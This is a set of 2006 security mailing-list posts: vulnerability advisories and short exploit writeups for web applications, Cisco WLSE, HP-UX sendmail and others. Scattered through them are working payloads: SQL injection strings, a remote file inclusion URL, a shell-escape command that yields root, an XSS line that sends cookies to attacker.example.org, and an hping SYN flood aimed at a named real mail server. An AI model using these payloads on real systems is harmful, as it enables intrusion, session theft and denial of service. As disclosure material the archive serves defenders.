> http://site/admin/ won't work. I did some research to see if 
> you could find a way to make "educated guess" by examining 
> the flow of HTTP responses, but I didn't came out with any 
> good idea. Nevertheless index.php doesn't seem to be a bad 
> educated guess (as Default.asp, index.asp, index.pl, login.asp...).
> 
> Now some questions and a proposal:
> - how safe is to rely on secrecy of the URL? I'm looking for 
> a quantification of the risk, not a "it is a bad idea" ;)
>  of course http://site/`pwgen -N1 30`/`pwgen -N1 30`.php is 
> safer than http://site/admin/index.php. Any already made 
> study? numbers?
> - are SE like google going to index such kind of pages if 
> there is no "external" link[*]?
> - are there already many specialized vuln crawlers looking 
> for such kind of URLs?
> 
> What about building crawlers that ignore redirection to scan 
> for such kind of vulns?
> I think that kind of mistake should be pretty popular.
> 
> Did I reinvent the wheel?
> 
> [1] this makes educated guessing easier increasing the number 
> of potential targets: manager.php, insert.php, delete.php and 
> it makes this [in]security model rely just on the dir path... 
> unless the programmer is so crazy to call all his files with 
> random names. But coding the access credential in a path 
> makes the code not that relocable... etc... etc..
> 
> [*] What I mean: it exists a chain of links that conn

Tlen.PL e-mail XSS vulnerability.

2006-04-19 Thread koper
As written in: http://security.pass.pl/adv/160406_XSS_tlen_pl.txt

::File: 060416_XSS_tlen_pl
::Date: 16 Feb 2006
::Author: Tomasz Koperski <[EMAIL PROTECTED]>
::URL: http://security.pass.pl



::1::Overview::
Tlen.PL e-mail system is affected to cross-site scripting vulnerability, not 
validating HTML tags in e-mail message subject. 



::2::Description::
Tlen.PL is a popular Polish IM system provided by o2.pl, which includes e-mail 
accounts, and e-mail client built into the 
communicator software (under Windows it is actualy an instance of Internet 
Explorer, displaying webmail system). 
Depending on the server 'assigned' to the account (varying probably by the date 
of registration), webmail client does 
not validate e-mail subject for HTML tags, allowing attacker to inject script 
code.
The vulnerable server is accessed by default with Tlen.pl IM client (by older 
accounts).
The vulnerable server does not provide webmail services through default web 
browser access
(using for ex.:  http://poczta.o2.pl, http://mail.tlen.pl), yet it is still 
accessible under http://beta.mini.tlen.pl 
and used inside Tlen.pl IM client.
On the account tested (login: koper, served by beta.mini.tlen.pl, 193.17.41.32, 
registered over 5 years ago), the lenght of 
subject displayed is 28 characters, which is the lenght an attacker can use to 
inject HTML.



::3::Impact::
An attacker could include some of this code inside the subject field of e-mail 
sent to the target account:

http://pass.pl"; 

//(28 chars, no HTML ending bracket, still http://pass.pl page is displayed 
inside ,
//giving an attacker the ability to include more code. Having shorter domain 
name allows an
//attacker to give valid  tag.


alert("xx") 

//Displays 2 chars alert window  

etc.



::4::Solution::
None provided, Vendor contacted on 16 Feb 2006.



::6::Systems affected::
All Tlen.pl Communicator versions, but not all accounts affected.
Servers checked to be vulnerable: beta.mini.tlen.pl [ 193.17.41.32 ].
Servers checked NOT to be vulnerable: mini10.tlen.pl [ 193.17.41.92 ].


Re: Multiple Vulnerabilities in LucidCMS

2006-04-19 Thread zachofalltrades
these vulnerabilites are dealt with for the next release candidate (RC6)


Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup

2006-04-19 Thread no . spam
Obnoxious, sure, but not hard to beat. (Assuming for some insane reason you are 
actually still using Windows for anything other than playing games)

You just add an entry in your DNS server with a zone matching the hostname that 
you want to override. And if they have the IP addresses of MSFT-controlled DNS 
servers hardcoded, you just add an iptables (or equivalent) entry in your 
firewall (note - this is a seperate device than your wintendo PC, not a peice 
of software running on your PC)


Fortinet28 box does not resist has small synflood!

2006-04-19 Thread testx444
Fortinet28 box does not resist has small synflood on smtp port!
ips protection is not effective because there is not enough syn!
 hping -i u10 -p 25 -S mail.fortinet.com



Concerned about your privacy? Instantly send FREE secure email, no account 
required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485



ContentBoxx Login.php Cross-Site Scripting

2006-04-19 Thread botan
Website : http://www.contentboxx.info/en/
Author : Botan

Description:

Web Content Management 

ContentBoxX is a professional software upon which the production of editorial 
systems, used in the maintenance of Internet and Intranet offers, are based. 
ContentBoxX is suited for use in demanding Web sites. And, because of its open 
architecture, is up to even the most complex challenges.

Vulnerable :

http://www.site.com/cms/login.php?action=XSS


WWWThread RC 3 MultBugs

2006-04-19 Thread o . y . 6
[code]// --- WWWThread RC 3 MultBugs --- //

* D3vil-0x1 | Devil-00
* www.securitygurus.net
* Gr33tz
- HACKERS PAL | n0m3rcy | -

&
All Others << i forgot them :))

//-//

//-// [ Bug 1 ] 
//-//

// File name :- register.php
// Bug :- Remote [ _COKKIE['forumreferrer] ] SQL Injection

/* Code
//
if(isset($_COOKIE["forumreferrer"]))
{
$referral_id = $_COOKIE["forumreferrer"];
$result = $db->query('SELECT referral_count FROM 
'.$db->prefix.'users WHERE id='.$referral_id)or 
error(mysql_error(), __FILE__, __LINE__, $db->error());
list($referral_val) = $db->fetch_row($result);
$rval = $referral_val[0] + 1;
$db->query('UPDATE '.$db->prefix.'users SET referral_count='. 
$rval . ' WHERE id='.$  referral_id) or 
error(mysql_error(), __FILE__, __LINE__, $db->error());
}
//
*/

Fix :-

/*
$referral_id = intval($_COOKIE["forumreferrer"]);
*/


//-// //-// 
//-// //-// 
//-// //-// 
//-// //-//

//-//  [ Bug 2 ] 
//-//

// File name :- message_list.php
// Bug :- Remote SQL Injection

/* Code

if( isset($_POST['delete_messages']) || isset($_POST['delete_messages_comply']) 
)
{
if( isset($_POST['delete_messages_comply']) )
{
confirm_referrer('message_list.php');
$db->query('DELETE FROM '.$db->prefix.'messages WHERE id 
IN('.$_POST['messages'].') AND owner=  
\''.$forum_user['id'].'\'') or error(mysql_error(), __FILE__, __LINE__, 
$db->error());
redirect('message_list.php?box='.$_POST['box'], 
$lang_pms['Deleted redirect']);
}

*/

// Fix :-

Replace with this code :D

if( isset($_POST['delete_messages']) || isset($_POST['delete_messages_comply']) 
)
{
if( isset($_POST['delete_messages_comply']) )
{
confirm_referrer('message_list.php');
$db->query('DELETE FROM '.$db->prefix.'messages WHERE id 
IN('.intval($_POST['messages']).') AND owner=  
\''.$forum_user['id'].'\'') or error(mysql_error(), __FILE__, __LINE__, 
$db->error());
redirect('message_list.php?box='.$_POST['box'], 
$lang_pms['Deleted redirect']);
}

// Exploit

- Resend This Requsit By HTTPLiveHeaders :D -

messages=[SQL]&box=0&delete_messages_comply=Delete
[/code]


Re: RE: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup

2006-04-19 Thread john
The XP DNS client has other problems as well.  It caches DNS failiures 
(arguably out of spec with the RFC, BTW), screwing up VPNs if you're VPNed into 
an internet network that has local domains which need to resolve to RFC1918 
addresses.  The cached failed lookups get prefered to forced entries in the 
hosts file, if that is tried as a way of forcing the dns lookups to work.  Very 
frustrating.  So, this isn't much of a surprise.  Rotten, yes, surprising, no.


Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup

2006-04-19 Thread robsekeris
After reading your scary message, went to verify your points and confirmed all. 
Whilst, as I've been running a real software firewall (Sunbelt Kerio Personal 
Firewall is for free) on top of a router firewall, I've been able to block or 
force a request as I see fit for each of these sites. On WMP, untick the 
Automatic Coded update function for starters, but indeed its highly irritating 
that you have no control over auto update yes/no. As to the MS firewall, that's 
a joke. It only does partial incoming traffic control and NONE on outgoing! 
If you like blocking specific IP's or ranges use for instance Peerguardian 2. I 
find it stops truly anything you don't want to not to come thru.

The bypassing of the HOSTS file is something i thinks would fall under required 
disclosurechanging functionality of an intergral part to network control. 
Think this build in trickery will have interest of the EU commission too!


Shbablek Mail Vulnerablitiy - Cross-Site Scripting

2006-04-19 Thread n0m3rcy
# Shbablek Mail Vulnerablitiy - Cross-Site Scripting
# by n0m3rcy
# Copyright (c) 2006 n0m3rcy <[EMAIL PROTECTED]>
# Exploit:

i) in the Already have an account?
ia) Account name: alert(1)
ib) Password: alert(1)

# Shoutz:
cijfer , dag , devil-00 , q-ex and all my friends

# have phun!


redirection vuln crawlers breed & security through obscurity

2006-04-19 Thread Ivan Sergio Borgonovo
I just came across such kind of code (php) written by a colegue:

//header.inc
if($_SESSION['UN']!='hardcoded_UN' or $_SESSION['UN']!='hardcoded_PW')
header("Location: ./login.html");
//missing else to mitigate the problem!!
//HTML stuff here...

code structure of all the other "supposed to be" private pages is:

//wannabeprotected.php
include_once("include/header.inc")
//wannabe protected code

Everything resides at something like:
http://site/admin/

of course the ONLY thing you've to do to break into the admin interface is:
- disable redirection in your preferred browser (w3m)
- guess the right address and
- point exactly to it: http://site/admin/index.php or any existing page[1] eg. 
http://site/admin/killingmesoftly.php

http://site/admin/ won't work. I did some research to see if you could find a 
way to make "educated guess" by examining the flow of HTTP responses, but I 
didn't came out with any good idea. Nevertheless index.php doesn't seem to be a 
bad educated guess (as Default.asp, index.asp, index.pl, login.asp...).

Now some questions and a proposal:
- how safe is to rely on secrecy of the URL? I'm looking for a quantification 
of the risk, not a "it is a bad idea" ;)
 of course http://site/`pwgen -N1 30`/`pwgen -N1 30`.php is safer than 
http://site/admin/index.php. Any already made study? numbers?
- are SE like google going to index such kind of pages if there is no 
"external" link[*]?
- are there already many specialized vuln crawlers looking for such kind of 
URLs?

What about building crawlers that ignore redirection to scan for such kind of 
vulns?
I think that kind of mistake should be pretty popular.

Did I reinvent the wheel?

[1] this makes educated guessing easier increasing the number of potential 
targets: manager.php, insert.php, delete.php and it makes this [in]security 
model rely just on the dir path... unless the programmer is so crazy to call 
all his files with random names. But coding the access credential in a path 
makes the code not that relocable... etc... etc..

[*] What I mean: it exists a chain of links that connect that page with a link 
on a homepage or an already indexed page.

BTW the colegue didn't set any association between .inc and the php 
interpreter. So you can even get the header.inc source with another maybe 
harder educated guess.

... and happy Easter holidays.

-- 
Ivan Sergio Borgonovo
http://www.webthatworks.it


Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup

2006-04-19 Thread Paul Wouters

On Sat, 15 Apr 2006, Thor (Hammer of God) wrote:


It's a simple method to bypass malicious host file modification.  Probably
in response to malware like MyDoom, which specifically altered the hosts
file to keep clients from accessing AV sites ( go.microsoft.com was also
specifically included in MyDoom as well.)


Sure. And instead of everyone whining about this, they should prepare
their DNSSEC setup so microsoft can secure their zone and can rely on
the resolver to use DNSSEC to prevent these types of malware traps.

Paul


Re: phpBB Admin command execution

2006-04-19 Thread dave . de
On which version of phpBB was this tested?


Cisco Security Advisory: Multiple Vulnerabilities in the WLSE Appliance

2006-04-19 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Multiple Vulnerabilities in the WLSE
Appliance

Advisory ID: cisco-sa-20060419-wlse

http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml

Revision 1.0

For Public Release 2006 April 19 1500 UTC (GMT)

- -

Contents


Summary
Affected Products
Details
Impact
Software Version and Fixes
Workarounds
Obtaining Fixed Software
Exploitation and Public Announcements
Status of this Notice: FINAL
Distribution
Revision History
Cisco Security Procedures

- -

Summary
===

There are two vulnerabilities that exist in the CiscoWorks Wireless
LAN Solution Engine (WLSE). The first is a cross site scripting (XSS)
vulnerability that may allow an attacker to gain administrative
privileges on the system. The second is a local privilege escalation
vulnerability that can be used by an attacker who already has
authenticated access to the command line interface to obtain access
to the underlying operating system.

Cisco has made free software available to address this vulnerability
for affected customers.

This advisory is available at 
http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml

Affected Products
=

Vulnerable Products
+--

A CiscoWorks Wireless LAN Solution Engine (WLSE) or WLSE Express
running any version of software prior to 2.13 are vulnerable to both
of these vulnerabilities.

Several other Cisco products are affected only by the local privilege
escalation vulnerability, including Cisco Hosting Solution Engine
(HSE), User Registration Tool (URT), Cisco Ethernet Subscriber
Solution Engine (ESSE) and CiscoWorks2000 Service Management
Solution. A separate Cisco Security Response has been published
regarding the impact and the fixes on these products and can be found
at http://www.cisco.com/warp/public/707/cisco-sr-20060419-priv.shtml

Products Confirmed Not Vulnerable
+

No other Cisco products are affected by both of these
vulnerabilities.

Details
===

CiscoWorks WLSE is a centralized, systems-level application for
managing and controlling an entire autonomous Cisco WLAN
infrastructure.

Two vulnerabilities exist in the WLSE appliance that may allow an
attacker to gain complete control of the device or to obtain access
to the underlying operating system.

These issues are documented by the following Cisco bug IDs:

  * CSCsc01095 (registered customers only) - Cross site scripting
vulnerability in WLSE appliance web interface
This fix addresses the cross site scripting (XSS) vulnerability
in the WLSE appliance web user interface. By exploiting this
vulnerability, an attacker may obtain the session cookie
information and further use this information to gain
administrative privileges on the system.
  * CSCsd21502 (registered customers only) - Privilege escalation to
Linux shell
This fix addresses the local privilege escalation from the
command line interface of the WLSE appliance. By exploiting this
vulnerability an attacker who already has authenticated access to
the command line interface may inject a command to obtain a shell
account on the underlying operating system.

Impact
==

By exploiting these vulnerabilities together, an attacker may obtain
complete control of the WLSE appliance.

Software Version and Fixes
==

When considering software upgrades, also consult 
http://www.cisco.com/go/psirt and any subsequent advisories to 
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center ("TAC") or your contracted
maintenance provider for assistance.

These vulnerabilities are fixed in the 2.13 version of WLSE software.
Fixed software can be downloaded from the following URL:

http://www.cisco.com/cgi-bin/tablebuild.pl/wlan-sol-eng

Workarounds
===

There are no workarounds for these vulnerabilities.

Obtaining Fixed Software


Cisco will make free software available to address this vulnerability
for affected customers. This advisory will be updated as fixed
software becomes available. Prior to deploying software, customers
should consult their maintenance provider or check the software for
feature set compatibility and known issues specific to their
environment.

Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree t

ThWboard <= 3 Beta 2.84 SQL Injection

2006-04-19 Thread Qex
 
Discovered by: Qex 
Date: 19 April 2006 
 

/showtopic.php?threadid=1&pagenum=[SQL]


RechnungsZentrale V2 - SQL injection and Remote PHP inclusion vulnerabilities

2006-04-19 Thread info

--
- GroundZero Security Research and Software Development 2006
 - 

--
-   
 -
-  Security Advisory regarding RechnungsZentrale v2.
 -
-  SQL Injection and Remote File inclusion Vulnerabilities. 
 -
-  Released: Tue Apr 18 18:00:00 CEST 2006  
 -
-   
 -

--




--
- Affected: 
 -

--

Software:   RechnungsZentrale V2
Version:1.1.3, likely older versions are affected aswell.
Vendor: http://www.nfec.de/



--
- Information:  
 -

--

"RechnungsZentrale V2 is a multiuser, Web-based billing application. 
 It facilitates the creation of bills and the management of customers. 
 It is written in PHP and uses MySQL. It supports German, English, French, 
 and Dansk languages."

The Software contains vulnerabilities which allow an Attacker to conduct
SQL injection and Remote File inclusion Attacks prior to Authentication.

The SQL injection vulnerabilitie exists in the login script (authent.php4) 
and 
allows an Attacker to log into the internal Interface or execute malicious 
SQL commands.

PoC:
User: ' OR '1'='1
Password: 1


In the same script it is possible to include a remote php by pointing the 
"rootpath=" option to a remote PHP script with a system() or passthru() 
function.
   
Doing so would allow an unauthenticated Attacker to execute shell commands 
with 
permissions of the Web Server. 

PoC: 

http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4



--
- Vendor Response:  
 -

--

Notified:   Tue Apr 18 16:12:14 CEST 2006
Response:   Tue Apr 18 17:13:14 CEST 2006 
(Development Discontinued)
Disclosure: Tue Apr 18 18:00:00 CEST 2006



--
- Bugs discovered by GroundZero Security Research and Software Development  
 -
- http://www.GroundZero-Security.com | Http://www.g-0.org   
 -

--


Multiple vulnerabilities in Linux based Cisco products

2006-04-19 Thread assurance.com.au
Assurance.com.au - Vulnerability Advisory
---
Release Date:
 19-Apr-2006

Software:
 Cisco Wireless Lan Solution Engine (WLSE)
 Cisco Hosting Solution Engine (HSE)
 Cisco Ethernet Subscriber Solution Engine (ESSE) 
 Cisco User Registration Tool (URT)
 CiscoWorks2000 Service Management Solution (SMS) 
 Cisco Vlan Policy Server (VPS)
 Cisco Management Engine (ME1100 Series)
 CiscoWorks Service Level Manager (SLM)


Vulnerabilities discovered:

 (1) A Vulnerability in the CiscoWorks WLSE "show" CLI application allows
 execution of arbitrary code as the root user. 

 (2) Cross-site scripting flaw allows session theft

Vulnerability impact of each:

 (1) Medium - An authenticated user can gain root access to the Linux based 
  system

 (2) Low - A targeted attack could lead to session theft and administrator
   compromise

Vulnerability information

 (1) The Cisco shell presents the administrator with a restricted set of 
 commands which includes a "show" application. The "show" application has
 several vulnerabilities which allow an attacker to "break out" of the 
 shell and execute commands (including /bin/sh) as the root user.

 This "show" application has been in use on this Linux-based platform 
 build since 1999 and exists on several other Linux-based Cisco products.

 Example:
  An Administrator is logged into the Cisco WLSE via either Telnet or SSH.

  [EMAIL PROTECTED]: show version
   (C) Copyright 2005 by Cisco Systems Inc.
   WLSE 1130 Release 2.11FCS Thu Apr 14 00:09:56 UTC 2005
   Device Limit = 2550
   Build Version (67) Tue Mar 15 18:13:02 UTC 2005
   Uptime: 2 days 3 hours 32 mins
   Linux version 2.4.28-5_WLSEsmp ([EMAIL PROTECTED]) (gcc version 2.96 2731
   (Red Hat Linux 7.3 2.96-113)) #1 SMP Mon Jan 31 16:04:20 PST 2005
   1130
   Intel(R) CPU at  3065.897 Mhz with 3105924K bytes of memory.

  [EMAIL PROTECTED]: show syslog include ";/bin/sh -i;"

  sh-2.05a# id
   uid=0(root) gid=502(admin) groups=502(admin),500(enable)

  At this point the administrator has root level access to the Linux-based
  Cisco device.

 (2) A cross-site scripting flaw exists in:
  /wlse/configure/archive/archiveApplyDisplay.jsp
with the "displayMsg" parameter. This can be used to steal the JSP session
cookie, therefore giving a targeted attacker admin level access to the 
system.  Once the attacker has admin web GUI access to the system via the 
XSS, they can then change the admin password or create a new admin user 
(without requiring the admin password).

The attacker can then use the aforementioned "show cli" local root 
vulnerability to gain complete control of the Cisco Linux-Based system.

As with (1) above Telnet or SSH access is required to login with the 
newly created user with admin level access in order to exploit the 
"show cli" bug.

  Example:
   http://cisco-wlse.example.org/wlse/configure/archive/ \
   archiveApplyDisplay.jsp?displayMsg=document.location='http:// \
   attacker.example.org?'+document.cookie
 
  The cookie posted to attacker.example.org includes the JSESSIONID token:
   ORIG_URL=cisco-wlse.example.org; browser_tzoffset=-660; \
   JSESSIONID=johjehk2h1; \
   HSE_TKT=admin:1133234898:17e5187e228ab1546ac26ef4ecacf689

  When combined with vulnerability (1), it allows a targeted attacker to gain
  root access to the linux system.  

Solution:
 Cisco has released patches for the vulnerabilities.

References:
 Assurance.com.au advisory
 http://www.assurance.com.au/advisories/200604-cisco.txt

 Cisco advisory note:
 http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml
 
 Cisco security response:
 http://www.cisco.com/warp/public/707/cisco-sr-20060419-priv.shtml

Credit:
 Adam Pointon of Assurance.com.au
 http://www.assurance.com.au/

Disclosure timeline:
 30-Dec-2005 - Discovered during configuration for a customer
 29-Jan-2006 - Email sent to psirt[at]cisco.com with full technical details
 31-Jan-2006 - Response received from Cisco psirt
 01-Feb-2006 - Cisco advises bug reports have been opened for both issues
 05-Apr-2006 - Cisco releases patches to Assurance.com.au for testing
 19-Apr-2006 - Advisory released

About us:
Assurance.com.au is a specialised information security consultancy. 
Our mission is to help organisations identify and secure information 
assets. Our expertise concentrates in security architecture, managed 
security and professional services in security testing/review and 
compliance. 

Supporting this approach are services in the following areas: 

* Compliance Services - Penetration testing, security reviews, 
compliance and audit services 

* Wireless and mobility solutions - design, installation and 
management of IEEE 802.11a/b/g (WiFi), tele-mobility and other 
wireless solutions 

* UNIX-like systems, netw

[security bulletin] HPSBUX02108 SSRT061133 rev.7 - HP-UX running Sendmail, Remote Execution of Arbitrary Code

2006-04-19 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00629555
Version: 7

HPSBUX02108 SSRT061133 rev.7 - HP-UX running Sendmail, Remote
Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted
upon as soon as possible.

Release Date: 2006-04-17
Last Updated: 2006-04-18

Potential Security Impact: Remote Execution of Arbitrary Code

Source: Hewlett-Packard Company,
HP Software Security Response Team

VULNERABILITY SUMMARY
A vulnerability has been identified in Sendmail which may allow a
remote attacker to execute arbitrary code.

References: CVE-2006-0058

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.00, B.11.11, B.11.23.

BACKGROUND

CERT has published a vulnerability report available at:
http://www.kb.cert.org/vuls/id/834865

This bulletin will be revised as other versions of Sendmail become
available.

To determine if an HP-UX system has an affected version,
search the output of "swlist -a revision -l fileset"
for one of the filesets listed below. For affected systems
verify that the recommended action has been taken.

AFFECTED VERSIONS

For sendmail 8.13.3
HP-UX B.11.23
==
SMAIL-UPGRADE.INET-SMAIL
SMAIL-UPGRADE.INET2-SMAIL
action: install revision B.11.23.02.002 or subsequent
URL: ftp://sendmail:[EMAIL PROTECTED]/
sendmail-8.13_1123.depot

HP-UX B.11.11
==
SMAIL-UPGRADE.INETSVCS-SMAIL
action: install revision B.11.11.02.002 or subsequent
URL: ftp://sendmail:[EMAIL PROTECTED]/
sendmail-8.13_.depot

For sendmail 8.11.1
HP-UX B.11.23
==
InternetSrvcs.INETSVCS2-RUN
action: install UNOF_INET31734_1.depot or subsequent
URL: ftp://sendmail:[EMAIL PROTECTED]/
UNOF_INET31734_1.depot

 ->HP-UX B.11.11
==
SMAIL-811.INETSVCS-SMAIL
 ->action: remove SMAIL-811 and migrate to SMAIL-UPGRADE
URL: ftp://sendmail:[EMAIL PROTECTED]/
sendmail-8.13_.depot

HP-UX B.11.00
==
SMAIL-811.INETSVCS-SMAIL
action: install revision B.11.00.01.006 or subsequent
URL: ftp://sendmail:[EMAIL PROTECTED]/
sendmail-811_01.006.depot

For sendmail 8.9.3 and previous
HP-UX B.11.11
==
InternetSrvcs.INETSVCS-RUN
action: install UNOF_INET_29774_1.depot or subsequent
URL: ftp://sendmail:[EMAIL PROTECTED]/
UNOF_INET_29774_1.depot

HP-UX B.11.00
==
InternetSrvcs.INETSVCS-RUN
action: install UNOF_INET29773_1.depot or subsequent
URL: ftp://sendmail:[EMAIL PROTECTED]/
UNOF_INET_29773_1.depot

END AFFECTED VERSIONS


RESOLUTION

HP has made the following software updates available to resolve
the issue.
Installations running sendmail 8.8.6 should upgrade to sendmail
8.9.3 or 8.11.1 from the patch/upgrade software listed in this
bulletin.
Installations running sendmail 8.11.1 on HPUX 11.11 should upgrade
to sendmail 8.13.3 from the upgrade software listed in this
bulletin.

The software updates can be downloaded via ftp from:

System: hprc.external.hp.com (192.170.19.100)
Login: sendmail
Password: sendmail (NOTE: CASE-sensitive)

ftp://sendmail:[EMAIL PROTECTED]/
or
ftp://sendmail:[EMAIL PROTECTED]/

The README.txt.pgp there contains cksum and md5 output for the
preliminary depots.

For sendmail 8.13.3, HP-UX B.11.23
sendmail-8.13_1123.depot
cksum 692720776 15759360
md5 E09933A4AECC16B97A8F7ACF07060F84

For sendmail 8.13.3, HP-UX B.11.11
sendmail-8.13_.depot
cksum 954959898 5130240
md5 C85EFD8AEDB16EEF1DF0FF65988350C0

For sendmail 8.11.1, HP-UX B.11.23
UNOF_INET31734_1.depot
cksum 3327957574 3317760
md5 B17A7F5566214B35E983B3F53C309A17

UNOF_INET31734_1.text
cksum 2096860596 7487
md5 565F7963B77BEE3EB2825990F60D1F6D

 ->For sendmail 8.11.1, HP-UX B.11.11
 ->sendmail-811_08.depot
 ->cksum 3968008060 2938880
 ->md5 91a050b976b522a27558e92673fca591

For sendmail 8.11.1, HP-UX B.11.00
sendmail-811_01.006.depot
cksum 4072259977 2846720
md5 847aa9f1a154da9b07afc26d91fbaba6

sendmail-811_01.006.text
cksum 2379624538 36262
md5 cac0d95747af260f40dac7cc943f6353

For sendmail 8.9.3 and previous, HP-UX B.11.11
UNOF_INET_29774_1.depot
cksum 3708819014 890880
md5 8580A701FC19A49703C852440DBD25FA

For sendmail 8.9.3 and previous, HP-UX B.11.00
UNOF_INET29773_1.depot
cksum 2797348841 1372160
md5 2b33f65a2c81894849a5a6eb7d67650f

UNOF_INET29773_1.text
cksum 2797348841 1372160
md5 67acbcff161b71930365b3b77788fbde

After installation, verify output of what /usr/sbin/sendmail.

To check if installations are running sendmail 8.8.6 execute
"what /usr/sbin/sendmail"
and check the version string.

 ->Upgrading sendmail 8.8.6 / 8.9.3 to 8.11.1 or 8.13.3 is done
 ->using the depots mentioned in this bulletin.

 ->Sendmail-811 for HP-UX B.11.11
 ->In lieu of installing the upgrade SMAIL-811 consider upgrading
 ->to sendmail 8.13.3 available in SMAIL-UPGRADE.
 ->If servers are running sendmail 8.11.1 and can not be upgdraded
 ->to 8.13.3 a solution is available by contacting your support
 ->representative.



MANUAL ACTIONS: Yes - NonUpdate
HP-UX B.11.00 - install preliminary software update

Re: [KAPDA::#41] - Mambo/Joomla rss component vulnerability

2006-04-19 Thread rey . gigataras
This issue was addressed in the Joomla! 1.0.8 release:
http://forum.joomla.org/index.php/topic,55808.msg298644.html#msg298644
http://www.joomla.org/content/view/940/74/



Rey Gigataras
-
Joomla! Core Developer
Stability Team Leader
www.joomla.org


Re: Path Disclosure and Arbitrary File Read Vulnerability in SLAB5000

2006-04-19 Thread office
These issues were brought to my attention, and I have patched the page= issue.

I welcome any other friendly prodding of my system. Please notify me if you 
find more vulnerabilities.


Cisco Security Advisory: Cisco IOS XR MPLS Vulnerabilities

2006-04-19 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Cisco IOS XR MPLS Vulnerabilities

Advisory ID: cisco-sa-20060419-xr

http://www.cisco.com/warp/public/707/cisco-sa-20060419-xr.shtml

Revision 1.0

For Public Release 2006 April 19 1500 UTC (GMT)

- -

Contents


Summary
Affected Products
Details
Impact
Software Version and Fixes
Workarounds
Obtaining Fixed Software
Exploitation and Public Announcements
Status of this Notice: FINAL
Distribution
Revision History
Cisco Security Procedures

- -

Summary
===

Multiple Multi Protocol Label Switching (MPLS) related
vulnerabilities exist on Cisco IOS  XR. Only systems that are running
Cisco IOS XR and configured for MPLS are affected by these
vulnerabilities.

Upon successful exploitation a Modular Services Card (MSC) on a Cisco
Carrier Routing System 1 (CRS-1) or a Line Card (LC) on a Cisco 12000
series router may reload affecting switched traffic.

Cisco has made free software available to address this vulnerability
for affected customers.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20060419-xr.shtml.

Affected Products
=

Vulnerable Products
+--

Only systems that are running Cisco IOS XR and configured for MPLS
are affected by this vulnerability.

Systems that are running Cisco IOS XR and configured for MPLS can be
identified by the show mpls interfaces command. A sample output of
this command on a CRS-1 that is configured for MPLS is given below.

  RP/0/RP1/CPU0:crs1#show mpls interfaces
  Interface  LDP  Tunnel   Enabled
  --   
  POS0/2/0/0 Yes  Yes  Yes
  POS0/2/0/1 No   Yes  Yes
  POS0/2/0/2 Yes  No   Yes
  POS0/2/0/3 Yes  Yes  Yes
  GigabitEthernet0/3/1/0 Yes  No   Yes
  GigabitEthernet0/3/1/3 Yes  No   Yes
  POS0/3/0/1 Yes  Yes  Yes
  TenGigE0/6/0/0 Yes  No   Yes
  RP/0/RP1/CPU0:crs#


In the above output, the fourth column labeled Enabled identifies
MPLS enabled interfaces.

Products Confirmed Not Vulnerable
+

Cisco IOS XR only runs on CRS-1 or Cisco 12000 series routers. Other
Cisco products, including systems that run Cisco IOS are not
affected.

Details
===

Cisco IOS XR Software is a member of the Cisco IOS Software Family
that uses a microkernel based distributed operating system
infrastructure. Cisco IOS XR runs both on Cisco CRS-1 and Cisco 12000
series routers.

More information on Cisco IOS XR can be found at the following URL:

http://www.cisco.com/en/US/products/ps5845/index.html

Modular Services Cards (MSC), also called the line cards are Layer-3
forwarding engines on Cisco CRS-1. An MSC is paired with a physical
layer interface module (PLIM) which provides layer-1 and layer-2
services.

More information on Cisco CRS-1 architecture can be found at the
following URL:

http://www.cisco.com/en/US/products/ps5763/index.html

Specific MPLS packets that are switched by a Cisco CRS-1 or a 12000
series system will restart the NetIO process. If the NetIO process is
restarted several times consecutively, the line card will reload
causing a Denial of Service (DoS) condition for the traffic that is
being switched on that line card.

MPLS packets will be forwarded through the MPLS network. Therefore,
packets that can trigger this vulnerability can be sent from remote
systems that are in the MPLS network. Such packets can not be
received on interfaces that are not configured for MPLS.

This vulnerability is addressed by the following Cisco bug IDs:

  * CSCsd15970 -- MSC crash upon receipt of specific MPLS packets
This bug only affects CRS-1 and does not affect Cisco 12000
series routers that are running Cisco IOS XR.

  * CSCsd55531 -- MPLS packet handling problems
This bug only affects CRS-1 and does not affect Cisco 12000
series routers that are running Cisco IOS XR.

  * CSCsc77475 -- Line card crash upon receipt of specific MPLS
packets
This bug affects both CRS-1 and Cisco 12000 series routers that
are running Cisco IOS XR.


Impact
==

Successful exploitation of the vulnerability may result in a reload
of the Modular Services Card (MSC) on a CRS-1 or the line cards on a
Cisco 12000 series router. Repeated exploitation could result in a
sustained DoS attack.

Software Version and Fixes
==

When considering software upgrades, also consult 
http://www.cisco.com/go/psirt and any subsequent advisories to 
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to

XSS Vulnerability in Guest-book script powered by Community Architect

2006-04-19 Thread susam . pal
[This document is best seen with Font: Verdana Size: 9pt]

Advisory Name
===
XSS Vulnerability in Guest-book script powered by Community Architect

Vulnerable Systems
==
Sites providing web-hosting service powered by Community Architect.

Found By
===
Susam Pal

Found On
===
4th April, 2006

Vulnerability Type
=
Cross Site Scripting (XSS)

Action Taken
=
Reported to 20m.com (20m.com is one of the sites powered by Community Architect)

Response
===
20m.com fixed the vulnerability on 10th April, 2006

System Description
==
